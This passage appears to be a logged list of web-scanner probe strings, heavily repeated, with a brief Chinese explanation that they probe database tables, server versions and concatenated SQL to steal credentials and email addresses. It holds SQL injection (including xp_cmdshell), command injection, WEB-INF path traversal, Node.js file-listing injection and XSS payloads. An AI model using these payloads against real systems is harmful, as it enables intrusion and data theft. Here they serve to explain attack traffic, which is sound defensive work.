"'
res.end(require('fs').readdirSync('.').toString())
res.end(require('fs').readdirSync('.').toString())
"Aryprobehb0004C6
Aryprobehb0004C6
ryprobehb0004C6
ryprobehb0004C6
\WEB-INF\web.xml
//â¦.//WEB-INF/web.xml
\..\WEB-INF\web.xml
/../WEB-INF/web.xml
(select )
/WEB-INF/web.xml
+ ltrim('') + '
AVAK$(RETURN_CODE)OS
|| '' || '
;vol
||vol
exec master..xp_cmdshell 'ver'--
%' and 'f%'='f
and 'f'='f') --
" | "vol
| 'vol
&&vol
and 'f'='f
and 'f'='f' --
|vol
)
\"
;
"
\'
#&<(,+">;
�' having 1=1--
) having 1=1--
; select * from sys.dba_users--
\' having 1=1--
; select * from dbo.sysdatabases--
; select * from master..sysmessages--
1 having 1=1--
; select @@version,1,1,1--
having 1=1--
"
�' having 1=1--
) having 1=1--
\' having 1=1--
";SELECT 1;
1 having 1=1--
; select @@version,1,1,1--
;
having 1=1--
; select * from sys.dba_users--
; select * from dbo.sysdatabases--
; select * from master..sysmessages--
ProbePhishing
WFXSSProbe
AB
"
WF'SQL"Probe;A--B
WFXSSProbe'")/>
\WEB-INF\web.xml
"Aryprobehb0004B5
\..\WEB-INF\web.xml
res.end(require('fs').readdirSync('.').toString())
/../WEB-INF/web.xml
res.end(require('fs').readdirSync('.').toString())
\"
"
res.end(require('fs').readdirSync('.').toString())
)
\..\WEB-INF\web.xml
| 'vol
Aryprobehb0004B5
||vol
(select )
ryprobehb0004B5
;vol
AVAK$(RETURN_CODE)OS
"'
\"
|| '' || '
"'
ryprobehb0004B5
" | "vol
;vol
//â¦.//WEB-INF/web.xml
/WEB-INF/web.xml
res.end(require('fs').readdirSync('.').toString())
\WEB-INF\web.xml
" | "vol
;
+ ltrim('') + '
)
\'
+ ltrim('') + '
and 'f'='f') --
"
|vol
&&vol
/WEB-INF/web.xml
(select )
;
| 'vol
%' and 'f%'='f
exec master..xp_cmdshell 'ver'--
&&vol
%' and 'f%'='f
and 'f'='f' --
#&<(,+">;
||vol
|vol
and 'f'='f
#&<(,+">;
exec master..xp_cmdshell 'ver'--
AVAK$(RETURN_CODE)OS
and 'f'='f') --
//â¦.//WEB-INF/web.xml
\'
/../WEB-INF/web.xml
|| '' || '
and 'f'='f
and 'f'='f' --
; select * from sys.dba_users--
\' having 1=1--
�' having 1=1--
) having 1=1--
1 having 1=1--
\' having 1=1--
�' having 1=1--
) having 1=1--
; select * from sys.dba_users--
; select * from dbo.sysdatabases--
; select * from master..sysmessages--
; select @@version,1,1,1--
; select @@version,1,1,1--
having 1=1--
having 1=1--
; select * from dbo.sysdatabases--
; select * from master..sysmessages--
1 having 1=1--
�' having 1=1--
"
"
�' having 1=1--
1 having 1=1--
";SELECT 1;
";SELECT 1;
) having 1=1--
) having 1=1--
\' having 1=1--
1 having 1=1--
\' having 1=1--
having 1=1--
;
; select * from master..sysmessages--
; select @@version,1,1,1--
; select * from master..sysmessages--
having 1=1--
;
; select @@version,1,1,1--
WFXSSProbe
; select * from dbo.sysdatabases--
; select * from sys.dba_users--
; select * from sys.dba_users--
; select * from dbo.sysdatabases--
WFXSSProbe
WF'SQL"Probe;A--B
ProbePhishing
"
"
WF'SQL"Probe;A--B
ProbePhishing
WFXSSProbe'")/>
AB
AB
WFXSSProbe'")/>
这里有很多试探,比如说试探你的数据库的表结构select * from sys.dba_users--,试探你的服务器的软件环境select @@version,1,1,1--
试探你的程序是不是js拼接的sql(比如nodejs) + ltrim('') + '
还有一些可能是针对某个特定web系统的漏洞,等等。
黑客想要获取你的用户名和密码
邮箱地址吧。这种攻击的话